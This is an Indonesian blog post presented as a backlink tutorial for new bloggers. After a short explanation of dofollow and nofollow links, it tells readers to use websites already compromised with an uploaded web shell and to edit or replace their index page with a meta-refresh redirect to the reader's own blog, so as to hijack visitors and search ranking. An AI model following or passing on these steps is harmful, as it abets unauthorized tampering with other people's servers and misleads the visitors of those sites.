Tutorial Backlink Blog

(Easy man..)




Yaps balik lagi di blog kesayangan anda:v
Kali ini saya akan kasih tutorial sederhana bagi anda yang ingin menjadi bloger dan memulai masuk ke dunia bloger.Saya juga disini masih banyak belajar dan ingin memperdalam di dunia ini,karena ya intinya bisa dapet duit anjim kalo dah dapet addsense hehe.

Untuk tutornya sebenarnya sederhana dan terlalu singkat kalo saya tidak banyak bacot:v,jadi saya coba jelaskan dulu pengertiannya.Jadi backlink atau dalam bahasa Indonesia adalah tautan balik adalah sebutan untuk menamai sebuah tautan/link yang mengarah ke website kita. Backlink bisa dimanfaatkan sebagai rujukan untuk memudahkan pengguna atau sekadar untuk keperluan optimasi agar website kita lebih populer di mata mesin pencari.

Dari segi manfaat, backlink dibedakan menjadi dua jenis, yakni dofollow dan nofollow. Kedua jenis backlink di atas sebenarnya tidak berbeda sama sekali jika dilihat secara kasat mata. Namun, jenis backlink dofiollow lebih banyak disukai karena memiliki nilai tinggi di mata mesin pencari, sementara jenis nofollow relatif kurang diminati karena tidak memberikan efek berarti untuk website.

Nah itu sedikit penjelasannya,dan langsung ke tutorialnya saja,jadi kita akan coba backlink dengan menggunakan web yang sudah di upload shell ya.
Contoh:
[Saya menggunakan mini shell dari Stuck Xploiter Crew yang ukurannya kurang dari 1kb]

1. Pertama siapkan script html untuk ngeredirect nya,contoh:


<html> <head> <meta http-equiv='refresh' content='0; url=https://www.sundaxploit.my.id'> <a href='https://www.sundaxploit.my.id'></a>

Note: ganti link nya dengan link blog/website anda.


2. Edit file index nya dengan menambahkan script di atas,atau bisa juga menghapus kemudian index nya digantikan dengan script itu.


Seperti ini atau bisa juga seperti


Kalo udah jangan lupa klik save.

[Kedua cara di atas sama saja,sama-sama nge redirect ke blog anda,sehingga kunjungan ke blog anda ramai dan bisa membuat blog anda meningkat di mesin pencarian google.]


Untuk hasilnya kira-kira seperti ini:
Nah semakin banyak kita tanam backlink di web semakin banyak juga visitor yang mampir ke blog/website kita dengan sengaja ataupun tidak sengaja.




Yaps,sekian tutor dari saya kali ini,terimakasih telah menyempatkan untuk berkunjung dan membaca,mohon maaf bila ada kesalahan dan sampai jumpa di next konten selanjutnya,bye..

1 komentar untuk "Tutorial Backlink Blog"

Posting Komentar